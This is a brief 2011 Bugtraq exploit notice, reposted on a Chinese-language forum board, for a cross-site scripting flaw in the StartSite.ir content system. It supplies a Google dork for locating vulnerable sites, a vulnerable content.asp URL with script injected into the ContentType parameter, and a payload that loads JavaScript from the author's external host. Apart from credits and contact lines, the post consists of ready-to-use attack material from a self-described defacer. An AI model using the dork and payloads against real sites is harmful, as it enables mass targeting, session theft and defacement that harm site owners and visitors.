StartSite.ir Cross-site Scripting Vulnerability

看板Bugtraq作者時間14年前 (2011/04/06 02:01), 編輯推噓0(000)
留言0則, 0人參與, 最新討論串1/1
#------------In The Name Of God------------ # StartSite.ir Cross-site Scripting Vulnerability ################################### #AUTHOR: md.r00t #Mail: md.r00t.defacer@gmail.com #Website: www.r00t.gigfa.com #Forum: http://ajaxtm.com/forum ################################### #Google D0rk: # "Powered by StartSite.ir" ################################### # xss EXPLOIT: <script>alert(/0/)</script> <script src="" rel="nofollow">http://md-r00t.persiangig.com/xpl/XSS1.JS"></script> ######VULN IN HERE################## /content.asp?Catid=247&ContentType=<script>alert(/0/)</script> #################################### #TNX: #Ajax Security Team,Aria-Security Team (Persian Security Network),hadihadi & black.shadowes(Virangar Security Team) *****************************************
文章代碼(AID): #1DcrZb88 (Bugtraq)